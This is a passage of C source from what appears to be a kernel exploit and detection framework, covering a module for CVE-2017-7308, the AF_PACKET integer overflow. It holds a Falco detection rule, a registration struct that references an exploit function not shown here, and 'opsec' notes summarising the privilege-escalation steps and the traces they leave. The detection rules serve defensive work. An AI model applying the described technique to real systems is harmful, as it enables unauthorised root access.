ascii\n" " condition:\n" " any of them\n" "}\n"; static const char af_packet_falco[] = "- rule: AF_PACKET TPACKET_V3 setup by non-root in userns\n" " desc: |\n" " A non-root process creates an AF_PACKET socket and sets up a\n" " TPACKET_V3 ring inside a user namespace. CVE-2017-7308 trigger\n" " requires CAP_NET_RAW which userns provides. False positives:\n" " legitimate packet-capture tools running rootless (rare).\n" " condition: >\n" " evt.type = setsockopt and evt.arg.optname contains PACKET_RX_RING\n" " and not user.uid = 0\n" " output: >\n" " AF_PACKET TPACKET_V3 ring setup by non-root\n" " (user=%user.name proc=%proc.name pid=%proc.pid)\n" " priority: HIGH\n" " tags: [network, mitre_privilege_escalation, T1068, cve.2017.7308]\n"; const struct skeletonkey_module af_packet_module = { .name = "af_packet", .cve = "CVE-2017-7308", .summary = "AF_PACKET TPACKET_V3 integer overflow → heap write-where → cred overwrite", .family = "af_packet", .kernel_range = "K < 4.10.6, backports: 4.10.6 / 4.9.18 / 4.4.57 / 3.18.49", .detect = af_packet_detect, .exploit = af_packet_exploit, .mitigate = NULL, .cleanup = NULL, .detect_auditd = af_packet_auditd, .detect_sigma = af_packet_sigma, .detect_yara = af_packet_yara, .detect_falco = af_packet_falco, .opsec_notes = "Creates AF_PACKET socket and TPACKET_V3 ring inside unshare(CLONE_NEWUSER|CLONE_NEWNET); triggers integer overflow with crafted tp_block_size/tp_block_nr and sprays ~200 loopback frames. Audit-visible via socket(AF_PACKET) (a0=17) + sendmmsg from a userns process; KASAN tag 'iamroot-afp-tag' may appear in dmesg if enabled. No persistent files. No cleanup callback - kernel state unwinds on child exit.", .arch_support = "x86_64+unverified-arm64", }; void skeletonkey_register_af_packet(void) { skeletonkey_register(&af_packet_module); }